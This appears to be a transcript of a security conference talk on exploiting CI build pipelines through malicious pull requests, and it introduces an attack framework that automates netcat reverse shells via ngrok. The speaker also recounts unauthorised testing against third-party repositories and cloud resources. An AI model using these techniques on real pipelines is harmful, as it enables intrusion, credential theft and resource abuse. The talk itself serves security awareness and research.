 Welcome to Exploiting Continuous Integration and Automated Build Systems. I'll also be introducing a framework I wrote today called CIDR. I'm Spacebox, also Tyler. I'm a security engineer at a software company called Lean Kit. We're an agile and lean project management software company based out of Nashville. I do application and network security both offensive and defensive for them, although this talk is in no way reflective of them as a company. I like to break into systems. I think like many of us, that's how we got started. I also like building systems both defensive and offensive and weaponized. I like learning, but I don't need to explain that to this whole group of people. I do security consulting and bug bounty stuff. I'm also part of the Nashville DC 615 group when my children and schedule allow. We're going to go over a crash course of continuous integration and some of the high level concepts just to get everyone familiar and on board with these systems. Then we'll do, I'll list some of the tools and talk a little bit about the tooling involved in these processes. We'll go over the build chain and some configuration problems that are inherent in these build systems. I'll give a real world example of an exploit just to get everyone familiar with what exploiting these might look like. Then I'll go over some bad practices I found during my research with the deployment systems at the end of these build chains. Then I'll do an example of another attack and then I'll introduce CIDR. We need to start off with some definitions here. Continuous integration, according to my definition, would be systems and processes in place to allow and enable quick and iterative releases of code into production servers. Although it doesn't necessarily need to be production servers, it just needs to be a working environment of some kind. I'm sure this definition has some sort of oversight that I'm missing, but for the purpose of this talk, that's going to be the definition. People use these systems to enable quick iterative releases many times per day or week, as often the end goal, into environments. So it's the deployment chain from development all the way to production. These systems tend to be repository centric, which makes sense when you have developers who are developing code, and that code is the genesis for this entire process, so it would make sense that the repository is a very sort of centerpiece of this whole thing. The repositories are in chain with the automated build systems, so they often kick off these processes. And so they're a point of exploit, which we're going to be exploring. And another thing to note, not necessarily for my examples, but for, in general, these systems are being adapted to not only application code or server-side code, but the more we move towards more of a cloud-based infrastructure and automated infrastructure, these systems are and can be used for more infrastructure components to allow for continuous integration of the, not only the application code, but the systems on which the application code live. We have to talk about microservices, and it's a buzz word, and I needed probably to add the TM here for trademark, but they're so hot right now, but I just needed to, they're basically abstraction at its finest. Like, that's all it really is. It's not a new concept at all. It's the same old abstraction we've encountered in software development for the last 80 years. But as it relates to application code, it's the concept of breaking down large applications into small applications that do one or two things really well. And this allows for autonomous development in that you give a development team potentially the goal of saying, hey, we have this service. We need to do these two things. We need it to take X input and provide Y output. And that team can develop this thing and it can function on its own irrespective of the other services. It's built to handle failure and it's built to handle errors in a way that don't really impact other things if it's done. That's the theory. So there's some good security implications here, right? Frequent release cycles are fabulous. Faster code deployments equal quick remediation in theory. I think it was Zane Lackey who said that fast iterations were their greatest security feature. I would kind of second that, say it's a really good security feature. If you think about it, you have a CSER vulnerability or something and you drop it on the developers of fix and the developers fix it, the time from the point of fix to the time it's deployed is significantly reduced, which is really awesome, especially when you can reduce these to like 20 minutes. And the systems enable no outage deployments a lot of times. They reduce single points of failure to some degree. So imagine you have a web application and it has a left hand tool bar and the left hand tool bar is run by a single service and so if that service goes down, the entire application is not rendered unusable, just that component of it is. Likewise, compromise of a certain portion of these applications is not necessarily indicative of ponage of the entire system as a whole. So you might compromise something at some sort of server side injection and take run code and somehow take control of this container in which the microservice runs, but it does not necessarily mean that you have control over the entire application stack. It means you have control over that portion of the containerized application stack. But there are some inherently bad things too. Just sort of human error sort of things. When you have systems that enable quick deployments, it maybe puts undue pressure on those who are fixing the code to push fixes up quickly when perhaps more of you is needed. I would also argue that the automated build systems like the CI systems and the CI pipelines are checked less for security than the code in which they're deploying. So they kind of sit in this like middle sandwich layer where you have like infrastructure components that are being tested maybe through like a network pen test. You have application code which is being handled through like an application pen test and you got this quasi containerized environment that's sitting on its own IP space and its own containers on top of that or on top of the infrastructure but below the code and it's really not being tested. And so that's what we're going to be exploiting. We need to talk about tools. So we'll start with the build systems because it's the next step iteratively after the code repositories and the build systems basically listen and take code and they build it conditionally. These conditions are environment so it provisions an environment and it also usually runs tests. So you provide some sort of test script. It's supposed to run this test script against the code base. If it succeeds it gives you a thumbs up maybe back in GitHub. If it fails it lets you know. But these are mostly, most of the vendors are quasi containerized types of environments, right? So you have, you give it the code, it takes the code, it spins up a Docker container or some sort of quasi virtual environment, does the build and then tears it all down. These systems are, it's popular to have cloud and on-prem based systems. So for example Travis drone, well in CircleCI have cloud based solutions where you basically give it permission to look into your GitHub and it takes the code and builds it out there. But if you want to, a lot of these systems have enterprise versions. In fact some of them are exclusively enterprise and you pull these build frameworks down behind your own firewall and do the builds there. So it's, there's varying levels of threat depending on how these are hosted. But that's just something to be aware of and something that we'll surely take advantage of. But there's more. The deployment systems would be the next iteration after this. But the deployment systems very well might be one and the same as the build system. So I feel like I'm drawing a distinction here where there might not necessarily need to be one. Jenkins would be a vendor here that is a very popular one but it also would do the build portion as well. And some on the other page would do the build and also handle the deployments. So I'm not saying that these are hardened one way or the other although some do take, some are just a build service and some are just a deployment service. But some vendors here would be like Jenkins, Octopus Deploy, Kubernetes, Rancher, Mesosphere. A lot of these are headed in a containerized direction as well. So once they take your code maybe they even take an image and they deploy it to its respective infrastructure like a cluster of servers in which they are in control of they would then spin up containers and basically use those hosts as a resource pool to then provide containerized services. And this in a microservice architecture is where these services would go. So a basic chain of deployment might be developer man or woman pushes up to GitHub and that code can trigger a web type event. And let's say your build service, I use Travis in this example, has already established a trust relationship to the repository and it sees that a pull request or a commit or something, some event has happened and it knows to pull that code down and run its build. From there it might let GitHub know, hey, we've completed successfully or we've failed or some of these bundle and image up and it will actually create the image of the code you just built and it might ship it to code or an image repository like Dockerhub. And then from there the deployment service would either take the code from the source or it would take the code, take the image from the image repository and then from there it would deploy it out to like its cluster of servers where it's going to run some microservices and to, you know, whoever might be consuming them. These are not necessarily web facing, these are just services, services to do whatever you want them to do. But when we look at these, especially when we start attacking the build servers and that's kind of where I'm going to focus, the configurations for these are the largest exposure and there's some trends that are being adopted and kind of the development world that maybe aren't the safest. With the software development life cycle it's extremely common to be building codes before, building the code before merging it. In fact it's being, it's being adopted to build the code before even reviewing the code so that you can, you don't waste your time reviewing the code, right? Why would you want to waste your time reviewing the code if you know it's not even going to build? So a lot of these systems are triggering off of pull requests and commits to GitHub repositories. The pull request is the largest probably threat vector here, but you are essentially allowing manipulation of a repo and that repo holds downstream instructions for that build process. Most of the configurations for a lot of these systems is held in the root of the repository and so you have scenarios where you can make a pull request to a repo that you don't have permission over and in doing so you're triggering a build but not only that the PR could actually contain changes to the build process which allows for command injection and things like this. So that's what we're going to be exploiting. This is really nothing vendor specific. I'm not really dropping any ODAs on any vendors or anything like that. This is vulnerability stacking. So to attack some of these you might have three components misconfigured here that like in an example, you are taking advantage of the fact A that you're doing builds off of pull requests and B that you are, you can, you allow the pseudo required flag on the container so now you can run your build commands as root and maybe a third thing that you can shove an image up to image repository and so those three things stack together allow you to poison an image repository for a company. Each of these services might be functioning perfectly exactly as it's intended. It's the interaction between these services and the trust relationships that we're really going to be exploiting because there's just a lot of oversight that can happen. These things are like Legos and they're kind of up to the automation engineers or sys admins or whatever to like figure out how to fit them together. When you provide a web hook or a series of events that are being emitted, it's really up to the consumer of those events to know what to do with them, not the services providing them. So that's what we're going to take advantage of. I would say that the most volatile attack surface here is the scenario where you have maybe a company that has a public facing repository that they want contribution to for open source. We want an open source project, we want to give back to the world but we also don't want to validate any of our code before we do builds because you know, it takes a lot of time, right? Well, the thing is if they're hosting one of the internal based services and have them on a public repository, they're basically opening it up to allow you to run code on these build services that are internal and they're allowing that to happen from public repositories which is basically the world. So anyone can make a pull request, they don't have to accept the pull request, they don't have to commit it to a branch or anything like that. You just cut a branch and make a PR and run code on their servers. So specifically when we're attacking the build services, there are three main ways and a lot of the configuration files for these build services follow a very, very similar pattern. I mean it's almost, they're very small differences. Some of them are a super set of like a Docker compose file but most of them are some sort of YAML based thing and they follow kind of some patterns. So the ones that I really take advantage of are these pre-post commands. These are commands that are raw Linux commands most of the time that you're allowed to run to provision the environment in which you're going to build your test. So in many cases they actually allow you to specify a shell. So if you want to use bash instead of the regular shell or something else, it'll allow you to specify the shell on the image that you want to run this code in. And not only that but some of these systems allow you to, if you need to run as root, just tell me. Just add a pseudo required field to the repo and we'll give you a root container instead because that's easier. The other way, which I think this would be really fun to explore and I haven't explored it at all yet, but I think it would be really awesome. A lot of these specify an image in which to build, like a Docker image. And some of them allow you to blindly take an image from Docker Hub and pull that down and do your builds on that. But other ones actually will allow you to provide a Docker file and it will do a build of the image that you want to run on. So rather than worrying about injecting arbitrary commands on the Linux command line to compromise these machines, why don't you just pull down an already poisoned image and run that. It's already weaponized. You don't have to do any work. And the third way would be test builds. Some of these systems are getting privy to the fact that you can change the configuration files. Most of them really haven't done much about it. But like the new version of drone I think has the capability to say, hey, if the config file is changed, don't do a build. Well, that's fine, except most of these build files actually specify a test file to run. So who cares if I can't run, change the configuration file, right? I can just change the test script that runs and do all my malicious stuff through the test. So I'll give you a real world example. This was a colleague of mine came to me. I really didn't have quite a full understanding of these systems yet. I knew what they did. I knew how they worked, but I didn't really poked around at them. But this is a drone configuration. This is the real one. And he came to me and said I think if someone malicious had access to one of our repos they could actually end up running code on the build server. And I was like, okay, he was worried about them changing environment variables. That would seem to be his concern. He was worried about environment variables being changed. But as you can see here, it specifies the image on which to build, some environment variables to provision, some commands to run, and that's where it gets awesome. And then later you have the publish to a Docker repository and then some plug in information for alerting and such. So I thought, all right, let's do some command injection and just do like an echo statement, right? Just see if it says hello in the output of the build service. So I did and it worked. And I couldn't believe it. But it wasn't that big of a, you know, it was just an echo statement and it seems according to my reading that this is exactly how these systems were intended to function. It didn't seem like that big of a deal to me. But I thought if there's no limit to these commands, right, if they're not limiting the set of commands that I'm able to run on these containers, I could do something like that, right, as one command. And then something like that as another command. And then if I had some sort of like listening server, right? So with something like this, I was actually able to exploit the same repo they were talking about and get root on the build container, which is awesome. But I really, I didn't fully understand this. I had a whole lot of questions. So like, who is aware of this, right? Surely I'm not the only person to think this might be a concern. And as I'm doing a reading of the continuous integration build server providers, it's like most of them feel that this is the intended functionality. Yet there's a whole bunch of exposure through public facing repos to these build systems. Even if they're cloud based, I feel like there's implications here. But I wasn't fully aware of what the implications might be. Like what are all the different scenarios of public facing versus private versus cloud based versus on prem? And what is the real exposure here? Like what's the real attack surface? How many people are actually doing builds on their servers through public facing repositories? Or just repositories in general? So it turns out I was not the first to go down this avenue. Jonathan Claudius, I think he's know of Mozilla, but he came up with a tool a number of like three or four years ago called Rotten Apple. And it was really cool. And I drew a lot from it. It is an exploit or it's a framework for exploiting CI. I think he focused on Jenkins through Ruby code builds. Now I showed you this three ways that you might exploit through the configuration file. His focused on malicious test runs. So the code tests the third way. And he had an audit framework for kind of telling you how your Ruby Jenkins build might succeed or fail. He also had an attack mode on this thing where you could actually like do callbacks and you know dump SSH keys and things like this on the potentially vulnerable servers. There was a few other white papers out here on it but for being like three years of time in there I was kind of surprised that like more hackers hadn't hopped on this. But I thought I'll poke around. Seems interesting to me. Either I don't understand this well enough to do anything successful with it or it's just something that isn't being looked at. So I started poking around at the bug bounty and trying some of this on some repos which as it turns out is out of scope for these tests. But that was lessons learned later. So I was doing a test against I think a square and I did this same drone type attack except against their Travis servers. But it was the cloud hosted Travis servers and I let them know. I said hey I got on your Travis server I think I can mess up your build process or whatever. And they came back and said basically like this is not a concern to us. It affects us in no way. So I'm thinking like I feel like it does. You know to their point it wasn't running code on their own servers but it was at least running code in their deployment chain and it was queuing up builds in their build process. So I felt like at this point I still wasn't quite sure of the full implications of these. So I started to try to figure out who cares about this. I care. But it seemed like this vendor in particular didn't care. So some of the implications for cloud based services at the very least if I'm building code and I'm doing it through your cloud based version of like Travis for example. Yeah I'm not doing anything on your infrastructure. I am leveraging your repositories to do things on a server that's running code. I could clog up your build chain at the very least. Because these things queue up right. So if I open like 600 pull requests I'm going to open 600 queued builds that are just going to sit there until they go through. So quasi denial of service maybe. But this is free computing time. These are free computing resources. So for example drones computing resources I think max out at 50 minutes per build. They max out it. They close after 10 minutes of no standard out but I wrote some loops in my exploits to kind of like push that to you know dump a standard outline every minute so it reaches the full 50 minutes of potential. Drone is like 60 minutes by default. But it's free computing power so like why hasn't anyone built a botnet and like dozed the crap out of something. I'm not encouraging this. I said yes please but that has a question mark. I'm really not condoning this but think about it. Open it like a whole bunch of pull requests to a whole bunch of exposed services that are all triggering builds through one service and you're going to have this massive CI service like swarming on some target right? I'm kind of surprised that it hasn't happened yet. Or you could yeah this was a joke. I don't know how you do blockchain on a temporary build container but you could. But for the on prem this is like where the real threat might exist. So if you take over one of these build systems even though it's on a container you could take over a network because these containers share IP space even though they might be on their own mesh network of IPs they still have often times ports mapped to the host. There was an example in Jonathan's product or his code where he actually was able to submit a pull request that would make a commit back to master because that trust relationship between the build service and the repository wasn't in place so even though you didn't have any permissions on the repository it had sufficient SSH keys on the build service to talk back to the repository and make a commit to master so you could actually change master code without even having permission to access the repo. Or like the other ones and that's plausible too in theory on the cloud based services but you could also have the ability to alter downstream deployment environments. Moving on from the build services down to the deployment services or the hosted services rather. There's some microservice sort of practices that are being adopted that maybe aren't the healthiest. One is that environment variables are being used to store. Now this is again once you've done the build and you've deployed to production. Environment variables are being used to store credentials to access other services. This is one step better than having hard coded credentials in like a config file but it's when you compromise one of these services like I mentioned earlier yeah you haven't compromised the entire system but dump some environment variables and you'll probably be able to pivot some of the other systems. Additionally these only recently has sort of the Docker namespace stuff improved to a point where it's not really really hard or a pain to run a container not as root. And so that's what you find a lot of these services are running as root. Now you might be thinking well what's who cares it's a container right it's a temporary container at that. Yeah but like I said earlier you have ports that are mapped to the network so even if you're on like a 192.168 I don't know some sort of private IP mesh that the containers are setting on. Chances are if you scan like a ten zero zero zero like a slash eight network and do like a scan of that you're going to be able to access stuff on the host level. This is true most of the time. And also just because you might have a reduced footprint image like an Alpine Linux image which has a really small footprint and that's really cool and it has its place. If you compromise that Linux image and you have access to the internet on that image it doesn't really matter that it has a reduced footprint. I can augment that image into whatever I want it to be. So I'll give you another example. So I hadn't learned my lesson at this point and I was still poking around. In this case I was doing the same thing I did to the other vendor but I was doing it to Facebook and I was doing it through their Travis server as well. I was just trying to explore and find things. But this is an example where I actually ended up compromising the CI vendor themselves. So I was doing some basic reconnaissance work here so just some basic information to see what was on the container. I do this sometimes just to see if I'm running on-prem or if I'm running in the cloud, if I'm too lazy to go to the Travis server, I can just run the UI and check. But I notice a strange set of environment variables that were like GC, they lent themselves to like Google Cloud. So I started doing some research. I hadn't had much experience with Google Cloud and I had more experience with Azure and AWS. So I started to figure out that these environment variables lent themselves to the G Cloud CLI which is a command line utility to control infrastructure. So if I'm a company that's using Google Cloud to host all my servers on, these are the utilities to actually provision those environments. This should be something that the user of the CI service should have no part in using, even having access to. It has no value that I can see anyways to the user. This is something that Travis would want control over in order to provision their service to everyone. So I thought, in particular, I found this command set and the first two were of the most interest to me because they actually are what are used to provision resources and get project information. So I thought, all right, I'll give it a shot, right? I will do a basic command here in my pull request just to see if I can look at the project. And it worked. I couldn't believe it. I dumped project info for that current build which included SSH keys and some other things about that service. So I was like, oh man, this is pretty cool. But this again is kind of like read-only information. I don't know how big of a deal this is. Like the real trial here, right, is going to be if I can use this utility through a pull request to provision resources on their behalf. So I tried. And I couldn't believe it, but I tried and I did the pseudo G Cloud compute networks create test network mode auto. All this does is create a network called test networks. And it ran and it didn't error out and I was super happy. And then the second command down there lists them just so I wanted to verify that this indeed had happened. And as it happened, it's called test network. And not only that, but it provisioned these test networks in multiple regions. Yeah. So that was pretty exciting. I was really, really tempted to do this again and spin up servers. But I know that like this IP space stuff is usually virtual until it's used. And servers tend to charge money, so I didn't want to have to come to them and be like, hey, I did this thing, I found this vulnerability and I spun up servers and you're going to get a bill for it. But this was, this was, this was it. Really this can be reduced to two lines. One is the pseudo required, which says, hey, I need a container that allows me to run as root. And then I just needed one line. So with a two line PR to a repository that I didn't have access to, I was able to deploy a geo redundant network that spanned three continents. So now we'll talk about CIDR. And there's some video problems here. So I was going to try and do a live demo for you, but I thankfully have a recorded demo if it works. So we'll do that instead. But I really wanted to show that to you. So maybe I'll show you afterwards in the hallway. But CIDR is the continuous integration and deployment exploiter. There's not a lot of words that start with CI. So I was really scraping for acronyms here. It's a framework for exploiting and attacking the CI build chain. Mine primarily leverages the GitHub attack service to get access to the build services. So I'm really exploiting the build services here. Although there is so much potential to do, I'm hoping this kind of catches on and people want to use it and exploit further downstream services like deployment services, image repositories, or find other vendors or avenues of exploitation. But this is what mine does. It takes sort of the mess out of forking and PRing and callbacking. I have it handling callback shells. So you can basically exploit a whole bunch and just have your nice little sessions running and then hop into the shells whenever you want to. And I have a vendor specific exploits in which you just load and run. So it's kind of point and shoot. You give it a list of target repos. It figures out which ones the exploit is currently able to work against. And then it just runs them. I did it for fun. I did it because I'm also lazy and, man, when you have to fork a target repository, pull that fork down, make the change, commit that back to your attacker's repository, request a PR over back to the end of the repository, have that build and then have your little test fail. And then you have to do it all over again. It gets very repetitive and very, very old. So part of it was my own selfish laziness. But I also wanted to really bring awareness. I feel like this isn't being looked at very much at all. And in fact, these systems oftentimes have in their user agreements things in place that will, like, for example, the exploit I just showed you, I got banned from GitHub for that because, um, yeah, as it turns out, you're not right. It turns out it's against the user agreement to test against repos that you don't own. But I was really inspired by Jonathan Claudius's Rotten Apple product and I sort of wanted to expand upon that and facilitate for the research. So I'm not going to go over all the commands, but here's basically a CLI, kind of like a social platform for that. And I'll be posting the code after this talk. Basic help menus, add targets and list your targets. You can load your repository or load your exploit and actually you list exploits as well. So list the ones, find the ones you want, load them up. You can dump some basic information about them and hit run. It's written in Node, version 8. You'll also need a account and an ngrok account. These are free. So create a free account. Get your keys. Because there's a feature insider where you can do login and provide your credentials. So it stores them in an encrypted manner. That way it can use these keys in part of the attack. It can handle bulk lists of repos. I'm going to add a feature to do some cleanup right now. It just leaves your commits and pull requests wide open. So it is a little messy at this point. From an attacker's perspective if you're trying to be stealthy about this. Which I'm not condoning by the way. But I'm using ngrok too because port forwarding sucks. Sometimes I'm just too lazy to open a port and have the callback shell talk to my machine. I also am sometimes too lazy to hop on a pentest box and load it up with a public facing end point. So ngrok works basically like this. It's a service and it opens up a random subnet on their end point on a random port and it provides you that. And it tunnels that traffic back to your machine that's running ngrok. And then you can forward basically a proxy that tunnels out public web. Then you forward it on to your machine. So like when I'm spinning up a shell I open up a netcat instance and ngrok end point and callback in. It's just so I can like sit here on a network that I don't have access to and get callbacks. Like I said earlier it's against the GitHub user agreement to test against a repository even if you have permission from the owner of the repo. This means that you must be the owner of the repo to test the repo. So in testing be sure to ask them to make you an owner. So I'll do video demo time. Yes. So I am listing stuff here. I'm listing the exploits. So I listed targets. Now I'm listing the exploits. I'm going to load an exploit. In this case I'm loading the Travis netcat reverse shell which all this does is take every possible target and creates a shell for it and poisons the necessary repositories and creates a callback to the shells that I have open. So what this is doing in this example it's already been forked. These I had already forked them. I had already cloned them locally so it saw that as well. It determined which of these of the four that I was trying to attack the four in the list only two of them. But it figured that out and only is opening ports for those two. It started the ingrox service. Grab the data from the ingrox service and shoved it into the poisoned Travis YAML file and then it shoved the commit back up to my hacker's repository and requested a PR. So now what's happening is the PR has happened. It's triggering a build. And in theory there's a toolbar for that. But I have it doing a callback so you'll see it will say the eagle has landed. When I get a callback from that shell I'm probably going to take that feature out. I did it for demo purposes but it is kind of feels good when that pops up. So there it pops up the eagle has landed. So now I drop into my sessions menu after I celebrate biotext. And the sessions menu will do a new sort of area with its own help menu where I can list the currently available sessions and I just select the sessions. The sessions are named by target repository type so I'm attacking a group called space testerson and I have shell on that Travis server. And then I can back out of there. I hit back. It's the only Linux command that will not work. There's a Linux command called back. It will hop out of the session other menu. So that is Cider and a nutshell. There's other exploits I've written for this and I wrote it modularly to help urge contribution. But there's some limitations here. Again the build queues, they really build up. They stack up. So if you're trying to get code on multiple repos to execute and attack or do something at the exact same time you're probably going to have variances in the times in which it generates a lot of noise in GitHub. I don't know who's monitoring your GitHub logs for malicious stuff but if they are, they're going to see it. The good thing is if you get control of their build server it doesn't matter if they ban you from GitHub. You already have access to their build server. So it doesn't really matter anymore. There's timeout issues so I've tried to maximize the timeouts here so for things like a shell you get 50 minutes of that shell and things like having it spawn a new build process or something like that to kind of persist access but I haven't really gone down that route yet. And then keep in mind this is leveraging the GitHub API at this point so they have throttling in place I think at 5000 requests per hour. So if you try and do more than those API requests against target repos then you're going to hit a wall there. At the beginning I would like to add more CI frameworks. I feel like Jenkins is a popular one that I just haven't explored yet and I think that needs to be added. I'd like to start tackling more deployment services as well. Downstream deployment services I really haven't done much with that and I'd also like to start exploring other entry points. Right now I'm using only GitHub but I could do GitLab or Bitbucket or something like that that might kick off builds. There's a new movement called chat which makes me kind of nauseous but it's basically kicking off production builds and deployments from Slack. So I feel like that's just ripe. Like that's just, oh man. Thanks to the Linkit DevOps team Evan for sending me down a rabbit hole, Jonathan for his work and my wife for being cool with me staying up till 4am for the last month working on this software and this talk. I can be found on the GitHub where I'll be posting this code in the next hour or so and Twitter at spacebox02x and my blog is Untamed Theory. Thank you.